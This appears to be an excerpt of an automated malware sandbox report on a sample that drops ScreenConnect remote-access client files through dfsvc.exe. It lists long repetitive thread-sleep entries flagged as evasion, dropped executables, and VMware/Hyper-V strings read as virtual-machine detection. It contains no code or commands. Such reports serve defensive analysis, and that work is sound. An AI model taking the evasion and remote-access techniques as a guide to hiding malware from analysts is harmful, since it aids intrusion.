Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599560	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599452	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599335	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599222	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599085	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598932	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598808	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598697	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597936	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597764	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597428	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597192	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597075	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596967	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596747	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596530	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596418	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596194	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595983	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595655	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595436	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595317	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595193	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595004	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594855	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594743	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594421	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593984	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Window / User API: threadDelayed 3674			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Window / User API: threadDelayed 5972			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.WindowsFileManager.exe	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\mrKs8EKXbz.exe TID: 4620	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Users\user\Desktop\mrKs8EKXbz.exe TID: 4620	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -36893488147419080s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -599560s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -599452s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -599335s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -599222s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -599085s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -598932s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -598808s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -598697s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -598593s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -598484s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -598375s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -598265s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -598156s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -598046s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -597936s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -597764s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -597428s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -597312s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -597192s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -597075s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -596967s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -596859s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -596747s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -596640s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -596530s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -596418s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -596312s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -596194s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -596093s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -595983s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -595875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -595765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -595655s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -595546s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -595436s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -595317s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -595193s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -595004s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -594855s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -594743s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -594640s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -594531s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -594421s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -594312s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -594203s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -594094s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5432	Thread sleep time: -593984s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1008	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe TID: 5588	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe TID: 5668	Thread sleep time: -922337203685477s >= -30000s

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\Desktop\mrKs8EKXbz.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\mrKs8EKXbz.exe

Code function: 1_2_00024A4B FindFirstFileExA,

1_2_00024A4B

Source: C:\Users\user\Desktop\mrKs8EKXbz.exe	Thread delayed: delay time: 40000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599560	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599452	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599335	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599222	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599085	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598932	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598808	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598697	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597936	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597764	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597428	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597192	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597075	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596967	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596747	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596530	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596418	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596194	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595983	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595655	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595436	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595317	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595193	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595004	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594855	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594743	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594421	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593984	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Source: dfsvc.exe, 00000002.00000002.3012064740.0000015F998BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW5
Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: ScreenConnect.ClientService.exe, 0000000B.00000002.3391792549.00000000016F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllix
Source: Amcache.hve.5.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
